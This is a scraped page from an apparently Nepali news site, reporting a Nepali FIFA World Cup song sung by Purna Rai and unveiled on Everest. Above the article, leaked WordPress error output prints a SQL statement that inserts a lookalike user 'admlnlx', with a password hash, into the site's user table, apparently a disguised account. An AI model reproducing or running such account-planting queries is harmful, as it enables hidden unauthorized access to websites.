WordPress database error: [Disk full (/tmp/#sql-temptable-49a-7d9249-1121.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")]SHOW FULL COLUMNS FROM `gi_options`
WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bdbrp4BIg6PWPQhuHlPcrxz9rMVzVf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 22:16:24', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नोभेम्बर १८, २०२२ कतारमा आयोजना हुन गईरहेको फिफा वर्ल्डकप लाई समेटेर नेपालबाट पहिलो पटक फिफा वर्ल्डकप गीत सार्वजनिक भएको छ । फुटबल महासंग्राम फिफा वर्ल्डकपको गीतहरु बिभिन्न देशका कलाकारहरुले तयार गर्ने सिलसिलामा नेपालबाट भने यो पहिलो गीत हो । अंग्रजी भाषामा तयार गरिएको यो गीतलाई चर्चित गायक पूर्ण राईले गाएका हुन ।
सेभेन समिट फर फिफा वर्ल्डकप अभियानका लिडर नर्बिन मगरको नेतृत्वले फिफा ट्रफी (रेप्लिका), फिफा सम्बद्ध २११ राष्ट्रहरुको झण्डा र गायक पूर्ण राईले गाएको गीतलाई सगरमाथा चुचुरोमा सार्वजानिक गर्दै टिमले भिडियो समेत निर्माण गरेर फर्किएको छ । यो अभियानमा खेलकुद, विश्वशान्ती, पर्यटन र जलवायु परिवर्तन सम्बन्धी सचेतनामुलक नारा सहित विश्वको सात महादेशको अग्लो हिमालमा ट्रफी (रेप्लिका), झण्डा र टाईटल गीत पुर्याउने र सोही एतिहासिक सामाग्रीहरुलाई संग्राहलयमा राख्ने गरी फिफा संस्थालाई नेपालको तर्फबाट हस्तान्तरण गर्ने लक्ष्य रहेको छ ।
यस गीत लेखनमा नर्बिन मगर, संगीत बिकास चौधरी तथा संगीत सम्योजन सञ्जय हमालले गरेका हुन । यो गीत संगै भिडियो पनि टिमले युट्युब मार्फत सार्वजानिक गरिसकेको छ ।